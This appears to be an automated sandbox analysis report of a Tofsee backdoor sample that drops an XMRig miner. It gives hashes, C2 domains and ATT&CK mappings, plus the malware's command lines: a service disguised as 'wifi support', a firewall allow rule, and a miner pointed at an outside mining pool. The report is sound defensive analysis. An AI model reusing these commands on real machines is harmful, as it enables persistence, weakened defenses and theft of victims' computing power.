Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-05-2023 11:34

General

  • Target

    file.exe

  • Size

    268KB

  • MD5

    9b30c442d1e5f79e00beb59519f49bf1

  • SHA1

    e3f97e75276ba3b4756275bc1796396369b07b68

  • SHA256

    c30132d930b44ed9f7cbb78be47c9c3fb0bd0d34c3e0548304802c7c617cd185

  • SHA512

    931b892d036c75da6b8a7aeeb282e21d7715c52a2ab3a5636e38ddffadcb9be1261a26c7ae4407964d29c7caac526ec963fcc75cb3b76bf21ff3fb41b3dee931

  • SSDEEP

    3072:JoB1eK1AKuLq7ITFIiAq4pe5/kdg82Pd+YzF+UFOFQh91ESuPjco5E5WqFmcJObK:GB1IKuLiITpAqHFo0+oOFO7BI5qFBSw

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vtpdeohi\
      2⤵
        PID:4628
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kixfyojf.exe" C:\Windows\SysWOW64\vtpdeohi\
        2⤵
          PID:3656
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create vtpdeohi binPath= "C:\Windows\SysWOW64\vtpdeohi\kixfyojf.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3856
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description vtpdeohi "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:116
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start vtpdeohi
          2⤵
          • Launches sc.exe
          PID:4476
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1832
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 1036
          2⤵
          • Program crash
          PID:1512
      • C:\Windows\SysWOW64\vtpdeohi\kixfyojf.exe
        C:\Windows\SysWOW64\vtpdeohi\kixfyojf.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4624
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe --algo=cn-heavy/xhv -o fastpool.xyz:10162 -u abLocBRHmSKSwfZexhaPDFFpUd1Szsp1RWPZktGDuK2w76S3KYNSLGndi55YtoHoKYbSFMCCWjxzTfwHxZSm7sNLe2rAq4DqbAF.70000 -p x -k
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3948
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 512
          2⤵
          • Program crash
          PID:3256
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3056 -ip 3056
        1⤵
          PID:2304
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4712 -ip 4712
          1⤵
            PID:3588

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\kixfyojf.exe
            Filesize

            14.5MB

            MD5

            80fa18cc0b1fd97ba7b31de653b52734

            SHA1

            be07963777b10d2c039f7c3edf178819c15265fa

            SHA256

            5084b8c18ba5f565099c9c69928b7df2f703ed9fc20f1448323fac4a14ad4412

            SHA512

            822df40b6bc2c44ad27e0a8d870eccb8c9670f5b50ab984d63accdd1829634211de53879645030c16bcea3ff1a9426b7bd92aa134254ba7597908c2dee4f88ea

          • C:\Windows\SysWOW64\vtpdeohi\kixfyojf.exe
            Filesize

            14.5MB

            MD5

            80fa18cc0b1fd97ba7b31de653b52734

            SHA1

            be07963777b10d2c039f7c3edf178819c15265fa

            SHA256

            5084b8c18ba5f565099c9c69928b7df2f703ed9fc20f1448323fac4a14ad4412

            SHA512

            822df40b6bc2c44ad27e0a8d870eccb8c9670f5b50ab984d63accdd1829634211de53879645030c16bcea3ff1a9426b7bd92aa134254ba7597908c2dee4f88ea

          • memory/3056-135-0x0000000002510000-0x0000000002523000-memory.dmp
            Filesize

            76KB

          • memory/3056-139-0x0000000000400000-0x0000000000908000-memory.dmp
            Filesize

            5.0MB

          • memory/3948-199-0x0000000000C00000-0x0000000000CF1000-memory.dmp
            Filesize

            964KB

          • memory/3948-198-0x0000000000C00000-0x0000000000CF1000-memory.dmp
            Filesize

            964KB

          • memory/3948-197-0x0000000000C00000-0x0000000000CF1000-memory.dmp
            Filesize

            964KB

          • memory/3948-196-0x0000000000C00000-0x0000000000CF1000-memory.dmp
            Filesize

            964KB

          • memory/3948-194-0x0000000000C00000-0x0000000000CF1000-memory.dmp
            Filesize

            964KB

          • memory/3948-195-0x0000000000C00000-0x0000000000CF1000-memory.dmp
            Filesize

            964KB

          • memory/3948-193-0x0000000000C00000-0x0000000000CF1000-memory.dmp
            Filesize

            964KB

          • memory/3948-188-0x0000000000C00000-0x0000000000CF1000-memory.dmp
            Filesize

            964KB

          • memory/4624-166-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-172-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-159-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-160-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-161-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-163-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-162-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-164-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-165-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-167-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-153-0x00000000003F0000-0x00000000003F6000-memory.dmp
            Filesize

            24KB

          • memory/4624-168-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-169-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-170-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-171-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-156-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-173-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-174-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-175-0x0000000001760000-0x0000000001770000-memory.dmp
            Filesize

            64KB

          • memory/4624-176-0x00000000017F0000-0x00000000017F5000-memory.dmp
            Filesize

            20KB

          • memory/4624-179-0x00000000017F0000-0x00000000017F5000-memory.dmp
            Filesize

            20KB

          • memory/4624-180-0x0000000006F80000-0x000000000738B000-memory.dmp
            Filesize

            4.0MB

          • memory/4624-184-0x00000000025D0000-0x00000000025D7000-memory.dmp
            Filesize

            28KB

          • memory/4624-183-0x0000000006F80000-0x000000000738B000-memory.dmp
            Filesize

            4.0MB

          • memory/4624-152-0x0000000002000000-0x000000000220F000-memory.dmp
            Filesize

            2.1MB

          • memory/4624-149-0x0000000002000000-0x000000000220F000-memory.dmp
            Filesize

            2.1MB

          • memory/4624-148-0x00000000001D0000-0x00000000001E5000-memory.dmp
            Filesize

            84KB

          • memory/4624-146-0x00000000001D0000-0x00000000001E5000-memory.dmp
            Filesize

            84KB

          • memory/4624-140-0x00000000001D0000-0x00000000001E5000-memory.dmp
            Filesize

            84KB

          • memory/4624-144-0x00000000001D0000-0x00000000001E5000-memory.dmp
            Filesize

            84KB

          • memory/4624-143-0x00000000001D0000-0x00000000001E5000-memory.dmp
            Filesize

            84KB

          • memory/4712-145-0x0000000000400000-0x0000000000908000-memory.dmp
            Filesize

            5.0MB